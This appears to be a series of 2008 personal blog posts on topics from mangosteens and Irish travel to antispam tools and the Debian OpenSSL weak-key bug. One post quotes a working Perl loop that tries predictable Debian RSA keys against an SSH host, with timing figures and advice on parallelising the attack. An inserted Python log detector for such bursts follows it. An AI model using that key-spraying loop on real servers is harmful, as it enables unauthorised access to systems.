Since they're tricky enough to get hold of, I thought I should document exactly what to do with them once you get 'em ;)

They start off looking like this, roughly tomato-sized fruit with a thick, papery rind:

img

Get your thumbnail into the rind, not too deep though!, and tear it off like so:

img

Look at the rind's great colour! Watch out for it, though, as it stains clothing easily. Discard the rind, and pluck out the fleshy, juicy white segments:

img

(Pay no attention to their resemblance to testicles. ;)

Finally you'll wind up with 6 or so seedless segments, and 1 or 2 seed-bearing segments, larger than the others, containing a large inedible seed along with a fair bit of flesh:

img

Eat 'em and enjoy the flavour -- it's a bit like a tart, vanilla-y peach, but juicier, creamier and much smoother in texture. Mmmm, truly delicious. I'm looking forward to picking up some more soon!

I considered planting the seeds, but unfortunately, you can forget about growing a tree in your back yard; the mangosteen tree requires a tropical climate:

'The mangosteen is ultra-tropical. It cannot tolerate temperatures below 40° F (4.44° C), nor above 100° F (37.78° C). Nursery seedlings are killed at 45° F (7.22° C).'

Ah well. Seems I'll be at Tesco's mercy for more.

VCS and the 1993 internet

Joey Hess suggests that current discussions about the superfluity of DVCS systems have a parallel in how the internet protocol world, circa 1993, played out:

I'm reminded of 1993. Using the internet at that time involved using a mishmash of stuff -- Telnet, FTP, Gopher, strange things called Archie and Veronica. Or maybe this CERN "web" thing that Tim Berners-Lee had just invented a few years before, but that mostly was useful to particle physicists.

Then in 1994 a few more people put up web sites, then more and more, and suddenly there was an inflection point. Suddenly we were all browsing the web and all that other stuff seemed much more specialised and marginalised.

I would disagree, a little. Back in the early '90's, I was a sysadmin playing around with internet- and intranet-facing TCP/IP services (although in those days, the term "intranet" hadn't been coined yet), so I gained a fair bit of experience at the coal-face in this regard. The mish-mash of protocols -- telnet, gopher, Archie, WAIS, FTP, NNTP, and so on -- all had their own worlds and their own views of the 'net. What changed this in 1993 was not so much the arrival of HTTP, but TimBL's other creation: the URL.

The URL allowed all those balkanized protocols to be supported by one WWW client, and allowed a HTML document to "link" to any other protocol --

The WWW browsers can access many existing data systems via existing protocols (FTP, NNTP) or via HTTP and a gateway. In this way, the critical mass of data is quickly exceeded, and the increasing use of the system by readers and information suppliers encourage each other.

This was a great "embrace and extend" manoeuvre by TimBL, in my opinion -- by embracing the existing base of TCP/IP protocols, the WWW client became the ideal user interface to all of them. Once NCSA Mosaic came along, there really was no alternative to rival the Web's ease of use. This was the case even if you didn't have a HTTP server of your own; you could still access HTML documents and remote URLs.

In essence, HTML and the URL were the trojan horse, paving the way for HTTP (as HTML's native distribution protocol) to succeed. It wasn't the web sites that helped the WWW "win", but embrace-and-extend via the URL.

For what it's worth, I think there is an interesting parallel in today's DVCS world: git-svn.

Firefox Download Evening

Download Day

Happy Firefox Download Day -- or rather, Firefox Download Evening!

It turns out that the "day" in question has been defined as a 24-hour period starting at 10am Pacific Time; rather than compensating for the effects of timezones around the world, they've just picked an arbitrary 24-hour period.

That's 6pm in Irish time, for example. At least I'm not one of the 57,000 Japanese pledgers, who'd be waiting up until 2am to kick off their download. It seems a little bizarre that there's little leeway provided for non-US downloaders, who are right now twiddling their thumbs, waiting, while their "day" passes.

Annoyingly, the main world record page simply says 'the official date for the launch of Firefox 3 is June 17, 2008' -- no mention of a starting time or official timezone at all!

This is the top thread on their forum right now -- in addition to the omission of an entire continent ;)

adding to the “Going Dark” and DVCS debate

On programmers "going dark" -- Aristotle Pagaltzis writes:

Jeff Atwood argues that open source projects are in real danger of programmers “going dark,” which means they lock themselves away silently for a long time, then surface with a huge patch that implements a complex feature.

It seems to me that this is as much a technological problem as a social issue... and that we have the technological solution figured out: it’s called distributed version control. It means that that lone developer who locked himself in a room need not resurface with a single huge patch – instead, he can come back with a branch implementing the feature in individually comprehensible steps. At the same time, it allows the lone programmer to experiment in private and throw away the most embarrassing mistakes, addressing part of the social problem.

However, I don't think he realised that the Jeff Atwood story he responded to was in fact an echo of Ben Collins-Sussman's original article, where he specifically picked out DVCS as a source of this danger:

A friend of mine works on several projects that use git or mercurial. He gave me this story recently. Basically, he was working with two groups on a project. One group published changes frequently...

“…and as a result, I was able to review consistently throughout the semester, offering design tweaks and code reviews regularly. And as a result of that, [their work] is now in the mainline, and mostly functional. The other group [...] I haven’t heard a peep out of for 5 months. Despite many emails and IRC conversations inviting them to discuss their design and publish changes regularly, there is not a single line of code anywhere that I can see it. [...] Last weekend, one of them walked up to me with a bug [...] and I finally got to see the code to help them debug. I failed, because there are about 5000 lines of crappy code, and just reading through a single file I pointed out two or three major design flaws and a dozen wonky implementation issues. I had admonished them many times during these 5 months to publish their changes, so that we (the others) could take a look and offer feedback… but each time met with stony silence. I don’t know if they were afraid to publish it, or just don’t care. But either way, given the code I’ve seen, the net result is 5 wasted months.”

Before you scream; yes yes, I know that the potential for cave-hiding and writing code bombs is also possible with a centralized version control system like Subversion. But my friend has an interesting point:

“I think this failure is at least partially due to the fact that [DVCS] makes it so damn easy to wall yourself into a cave. Had we been using svn, I think the barrier to caving would have been too high, and I’d have seen the code.”

In other words, yes, this was fundamentally a social problem. A team was embarrassed to share code. But because they were using distributed version control, it gave them a sense of false security. “See, we’re committing changes to our repository every day… making progress!” If they had been using Subversion, it’s much less likely they would have sat on a 5000 line patch in their working copy for 5 months; they would have had to share the work much earlier.

To be honest, I'd tend to agree with Aristotle; just because centralized VC makes it harder to maintain a "private branch" with this "high barrier to caving", and this therefore imposes a technical pressure to fix a social problem, doesn't mean that is a good thing. I'd prefer to fix the DVCS to apply social pressure, and have both working tools and a working social organisation.

Another commenter on Ben's original post put it well:

I [..] disagree, strongly, that DVCS makes code hiding any more difficult than single-branch VCS. When using a single branch, it’s usually a very small group of people who are allowed to commit. Any patches from non-core contributors get lost in a tangle of IRC pastebins, mailing lists, bug trackers, and blog posts. Furthermore, even if these patches are eventually committed, they have lost all their associated version information — the destructive rebase you complain about. DVCS allows anybody to branch from trunk, record their changes, and publish their branch in a service like Launchpad or github. For an example of this, look at the mass of user-created branches for popular projects like GNOME Do or AWN.

It's very interesting to see those Launchpad sites, in my opinion.

I've spent many years shepherding contributions to SpamAssassin through our Bugzilla. We've often lost rule contributors, who are particularly hard to attract for some reason, due to delays and human overhead involved in this method. :( So an improved interface for this would be very useful...

Ireland tourism tips

connemara

So, Nelson is apparently contemplating a trip to Ireland, and was looking for tips. Since he's not the first to ask, I thought I'd do some research among my friends on things to do and good places to stay and eat in our native country. Here's the result.

First off -- it's worth noting that we're all thirty-somethings, so backpacker stuff and heavy boozing is no longer on the menu. If you're after that, though, head for Temple Bar in Dublin ;) This is mainly nice hotels, good food, and interesting things to look at.

To start with, I'd recommend driving as a means of getting around. Lots of the good stuff can't be reached any other way, and the roads are generally pretty good nowadays (if a little narrow).

Prepare for rain.

Things to do: Connemara and Kerry are stunning; in my opinion, they're unmissable, if you're coming to Ireland in search of natural beauty. Clare and West Cork are pretty good too. Generally, the west coast is the place to go.

A friend recommends the Skelligs: 'the best thing I've seen in Ireland. If it's sunny. If it's raining it sucks so don't go.' (I've never been -- appalling, given that my great-grandfather wrote one of the definitive works on them, I need to fix that.)

Stuff to avoid: Dublin's not too hot, unfortunately. Over-priced and hard to get around due to traffic. I mean, it's quite nice, especially to live in, but as a tourist destination compared to other cities around the world I don't quite get the attractiveness. Also, the south-east corner of the country, while full of nice friendly people, is exorbitantly expensive in my experience (even pricier than Dublin!), short on good stuff to see, and a bit of a washout, so I say skip it. (I have no idea why it's so expensive, BTW. my theory is that it's a traditional in-country holiday venue for Dubliners, and the Wexford inhabitants love to fleece us, so we got fleeced. whatever.)

In general, I'd say the larger towns aren't too exciting; stick to the country.

The Lonely Planet guide to Ireland, while frequently backpacker-oriented, is pretty good for non-backpacker stuff as well. If you're driving around, it's a good source of offbeat stuff to check out. I used it a lot when driving around Connemara last year. They also do a great book of hikes which I can recommend.

Next, places to stay... that friend again: 'if you're doing the Ring of Kerry, I strongly recommend diverting to Valentia and staying in Glanleam House (beautiful grub, beautiful gardens, cheap) and doing a day trip from there to the Skelligs.'

Temple House in Sligo also comes recommended: 'a classical Georgian mansion set in an estate of 1,000 acres, overlooking a 13th century lakeside castle of the Knights Templar.'

There are lots of useless hotel/B&B sites in Google, making it hard to tell crap from quality. But these sites come recommended:

  • Ireland's Blue Book - 'luxury accommodation in Irish Country House Hotels, Manor Houses and Castles. Also listed are Ireland's finest gourmet restaurants.' This is high-end stuff, but it's pretty reliable, as far as I can see.

  • Friendly Homes of Ireland - another friend says 'aka crazy houses of Ireland -- terrible webpage, but good accommodation (it's also a more attractive guide). We stayed here and loved it.'

  • Hidden Ireland - 'a unique collection of historic private houses which provide the very best and most stylish country house accommodation available in Ireland - great Irish hospitality at an affordable price. Our houses are not hotels and are very much more than ordinary guesthouses. They all offer a rare opportunity to experience the lifestyle of a bygone age - a special and fascinating alternative to conventional tourist accommodation.'

  • Irish Landmark Trust, if you're interested in self-catering stays at heritage houses.

  • Georgina Campbell guidebooks are apparently quite good.

Finally, scams and rip-offs are few and far between, so that's not something to worry about. Crappy service and mediocre food, however, are more likely to be the source of problems. At least you can now get decent espresso pretty much everywhere!

Hope that helps someone ;) Got tips of your own? Feel free to add comments!

TypePad AntiSpam

TypePad AntiSpam looks pretty cool. I've been trying it out for the past week on taint.org and underseacommunity.com, with no false positives or false negatives so far (although mind you I don't get much spam, anyway, on those blogs, fortunately). Both are WordPress blogs -- I set up Akismet, got a TypePad API key, and edited 3 lines in "wp-content/plugins/akismet/akismet.php", and I was off.

However, here's the key bit, the bit I'm most excited about -- /svn/antispam/trunk/, particularly the GPL v2 LICENSE file -- a fully open source backend!

The backend is a perl app built on Gearman and memcached. It uses DSpam instead of SpamAssassin, but hey, you can't have everything ;) Nice, clean-looking perl code, too. Here's hoping I get some tuits RSN to get this installed locally...

Daily links are back again

I've been talking to a few people recently who read taint.org (thanks!), but don't follow the linkblog. This means they miss half of the good bits I post :( Also, there's no way to comment on linkblog stuff, which is suboptimal.

To remedy this, I'm turning on daily links posting again, where I'll post the day's links, once a day, to the main blog.

If you're not interested, feel free to subscribe to this 'no-links' feed URL instead of the default -- it's the main blog content, but with the links posts filtered out.

Upgrading to Firefox 3

Firefox 3 Release Candidate 1 was released earlier this month. I've upgraded.

I tried switching to it a couple of months back, but gave up, since my favourite extensions were AWOL. This time around though, they're almost all present. Since Firefox is now basically an operating system in its own right, with upgrade pain all of its own, and a couple of people have asked, here's what I needed to do to get from Firefox 2 to 3:

Make a list of my favoured extensions

Namely, from most important to least:

Create a new Mozilla profile

This allowed me to keep my Firefox 2.0 settings entirely intact, a key step. Install Firefox 3, and start it with "firefox -ProfileManager", then create a new profile and start with that.

Get installing

The following extensions from the above list were available by now for Firefox 3, through addons.mozilla.org:

Firebug was slightly trickier, since you need the 1.2 beta version, specially designed for Firefox 3 support, available only from their 'releases' page.

However, Greasemonkey, SubmitToTab, and MozEx were still missing. :(

Greasemonkey, thankfully, wasn't too hard to find -- the latest nightly build from this directory does the trick.

MozEx seems dead -- the Firefox 2 support was added in a development snapshot, and there's no sign of Firefox 3 support. This was in danger of becoming a show-stopper, since I spend all day editing text in browser textareas in Trac, Bugzilla, and Wordpress -- until I found It's All Text!, which is even slightly prettier and simpler than MozEx. yay. The only thing to watch out for is that after setting the path to the editor command, I had to quit and restart the browser for it to recognise it as valid.

SubmitToTab is the only desirable plugin remaining. It looks like it won't be making it any time soon, but I'm prepared to live without it. ;)

Also, while discussing this on Twitter, Vipul wondered if XPather was available -- turns out that yes, v1.4 of XPather supports FF3. Looks cool too; I've installed it ;)

Copy bookmarks

Exit the browser, copy the "bookmarks.html" file from the old profile directory (~/.mozilla/firefox/jocfzbfo.jm in my case) to the new one (~/.mozilla/firefox/7bkf89ws.ff3), and restart it.

I didn't bother copying cookies -- I'm happy to log in again on all those sites. (I don't like carrying too much baggage between upgrades...)

I also opened the Greasemonkey user scripts dir (~/.mozilla/firefox/jocfzbfo.jm/gm_scripts), clicked on each script there, and installed them that way to FF3. A little laborious, but nothing serious really.

Done!

End result: I'm using FF3, and it's working quite nicely. Memory usage is consistently below 300MB, so far -- I haven't seen any bloating yet, which is a big improvement. I'm probably going to stick with it.

One thing: I did have to turn off the new image scaling effect, however -- text font size modification also now scales images to match, which is very annoying (and jaggy). No Squint allows this quite neatly.

More details on the “GMail forwarding hole”

Those INSERT guys, who've been talking about a GMail security hole allowing spammers to relay spam, have released more previously-redacted details here. (thanks to the MailChannels blog for pointing that out.)

In essence, the attack works by allowing a spammer to set the "forward to" address in GMail to point at a target address, send a spam to the GMail account, then change the "forward to" address to the next target and repeat.

My response:

  1. it'd be trivial for Google to impose stringent rate limits on "forward to" address changes, and I'd be surprised if they haven't already.

  2. ditto rate-limiting on the rate of forwarding messages for each GMail account.

  3. as they say in the paper -- if Google required up-front confirmation of the target address before forwarding any mail, that would also cut this out neatly.

  4. It's worth noting that while GMail's outbound servers may be whitelisted by some recipient sites, others are treating them negatively -- word on the anti-spam "street" is that GMail is becoming a festering pit of 419 scammers these days.

Ammado spam

Quoting an old job post: 'ammado.com are a new online global community with headquarters in Dublin, Ireland. ammado are developing a fun interactive online entertainment platform catering for a huge global market, using the latest technologies.'

Well, using that and spam, it seems. Look what just arrived in my inbox:

  • X-Spam-Status: No, score=-8.0 required=5.0 tests=BAYES_50, EXTRA_MPART_TYPE, HABEAS_ACCREDITED_COI, HTML_MESSAGE, RP_MATCHES_RCVD,SPF_PASS shortcircuit=no autolearn=unavailable version=3.3.0-r650054
  • X-Spam-Relays-External: [ ip=89.101.128.81 rdns=mail.ammado.com helo=mail.ammado.com by=soman.fdntech.com ident= envfrom= intl=0 id=4856CBA51B8 auth= msa=0 ] [ ip=192.168.11.20 rdns= helo=amsrvmail001.ammado.local by=amsrvmail001.ammado.local ident= envfrom= intl=0 id= auth= msa=0 ]
  • From: Peter Conlon <pconlon/at/ammado.com>
  • Date: Mon, 26 May 2008 10:45:11 +0100
  • Subject: UNHCR asks the blogosphere for help

UNHCR and ammado, http://www.ammado.com are reaching out to the blogosphere in an effort to spread the word for this year's World Refugee Day on June 20th and raise awareness of the situation of refugees all over the world!

This year, World Refugee Day is about protection, the heart and soul of UNHCR. With rising oil prices, decreasing food supplies, the adverse affects of climate change, the ongoing crisis in Darfur and a high number of unexpected natural disasters including those in Myanmar and China, the world's refugees have never been more in need of protection.

Another day, another spam. They also spammed Donncha, Michele and Damien, so it sounds like they're doing the rounds of the Irish blogosphere.

(Update: add Tom, Suzy, Alexia, squid at Limerick Blogger, and Grandad at Head Rambles to that list, too.)

However -- the hit on the HABEAS_ACCREDITED_COI SpamAssassin rule means that Ammado are a member of the Habeas Accredited Confirmed-Opt-In program, meaning that they have undertaken a bond to only email people who signed up to receive their communications using "confirmed opt-in". I have never had any dealings with Ammado, or opted in in any way to receive communication from them -- let alone confirmed an opt-in. This is out-and-out unsolicited bulk email, or spam, so this may turn out to be an expensive mistake for Ammado.

If you also got spammed by a Habeas-accredited sender, send a complaint to complaints /at/ habeas.com. This is how the Habeas system works...

PS: This is a good illustration of how spam is not Unsolicited Commercial Email, but UBE -- Unsolicited Bulk Email. Even though this is non-commercial, it's still spam!

MailChannels’ Traffic Control now free-as-in-beer

I'm on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies "the easy stuff" -- greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. -- in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend -- and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they're making it available as a download at http://mailchannels.com/download/. Apparently: "it's free for low-volume use, but high volume users will need a license key."

Anyway, take a look, if you're interested. I think it's pretty cool. (And I'm not just saying that because I'm on their tech advisory board. ;)

LWN.net on the Debian OpenSSL fiasco

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities -- typically distributions, but sometimes users -- to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution's package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Here's some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:

May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1

ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

  1. RSA is the default if you don't specify for ssh-keygen
  2. 99.99% of people use x86
  3. PID is sequential, and there's almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there's about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine -- you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.
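The log excerpt quoted above records only connection-level "Version" lines and nothing about the rejected keys, so the per-source connection rate is the signal a defender has to work with. The following is an added example, not code from the original post or from Craig Hughes: it parses that log format and flags bursts. The sample lines are constructed in the quoted format, and the 10-second window, the threshold of 8 connections and the `year` default are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the log format quoted above. 192.0.2.10 is a
# documentation address standing in for an ordinary interactive user; the
# first burst record is wrapped after "Remote:" the way mail-quoted logs are.
SAMPLE_LOG = """\
May 15 10:50:02 [sshd] SSH: Server;Ltype: Version;Remote: 192.0.2.10-40112;Protocol: 2.0;Client: OpenSSH_4.7p1
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:58:40 [sshd] SSH: Server;Ltype: Version;Remote: 192.0.2.10-40377;Protocol: 2.0;Client: OpenSSH_4.7p1
"""

TS_START = re.compile(r"^[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2} ")
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \[sshd\] SSH: Server;"
    r"Ltype: Version;Remote: (?P<ip>[0-9a-fA-F.:]+)-(?P<port>\d+);"
    r"Protocol: (?P<proto>[^;]+);Client: (?P<client>.+)$"
)


def unwrap(lines):
    """Rejoin records that were wrapped onto a second line."""
    record = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if TS_START.match(line):
            if record is not None:
                yield record
            record = line
        elif record is not None:
            record += " " + line  # continuation of the previous record
    if record is not None:
        yield record


def parse(lines, year=2008):
    """Yield (timestamp, remote_ip, client_banner); syslog omits the year, so it is assumed."""
    for record in unwrap(lines):
        m = LINE_RE.match(record)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["client"]


def detect_bursts(events, window=timedelta(seconds=10), threshold=8, keys_per_conn=7):
    """Flag sources that open `threshold` or more connections within `window`.

    keys_per_conn=7 is the figure from the quoted post (one logged connection
    per 7 keys offered); it only scales the estimate and does not affect alerting.
    """
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    totals = defaultdict(int)     # per-IP connection count over the whole log
    first_alert = {}
    for ts, ip, _client in sorted(events):
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in first_alert:
            first_alert[ip] = ts
    return {
        ip: {
            "first_alert": ts,
            "connections": totals[ip],
            "keys_tried_estimate": totals[ip] * keys_per_conn,
        }
        for ip, ts in first_alert.items()
    }


if __name__ == "__main__":
    for ip, info in detect_bursts(parse(SAMPLE_LOG.splitlines())).items():
        print(ip, info)
```

Because nothing in this log format marks an authentication failure, the threshold has to sit above what legitimate automation (backups, monitoring, config management) produces from a single source.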

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

If you've been following the Debian OpenSSL pRNG security debacle, you may have noticed that there's a painful problem for people who've used a Debian or Ubuntu system in the process of buying a commercial SSL key -- they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though -- some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key's CSR, and submit it to your CA according to their reissuance policy:

  • GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
  • Thawte: Here (Available throughout the lifetime of the certificate.)
  • VeriSign: Unknown
  • GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process "re-keying", while they call the act of sending you the same signed certificate as your original order a "reissuance".)
  • ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
  • CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time, as it seems that many users are reissuing their certificates.
  • Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don't really. Their low-cost RapidSSL certs require that you buy 'reissue insurance' for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the "buy" link for reissuance insurance -- the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

via Reddit, this Debian Security announcement:

'Luciano Bello discovered that the random number generator in Debian's openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! --jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.'

and, of course, here's the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

  • Ubuntu 7.04 (Feisty)
  • Ubuntu 7.10 (Gutsy)
  • Ubuntu 8.04 LTS (Hardy)
  • Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8
  • Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect "fix" applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news....

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally - they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to "add value" by getting in between the user of the software and its author.

+1!

For what it's worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that's one way to reduce the risk of upstream-vs-package fork bugs like this, since we'd have spotted that change going in, and nixed it before it caused this failure.

Here's a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter --jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL's responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

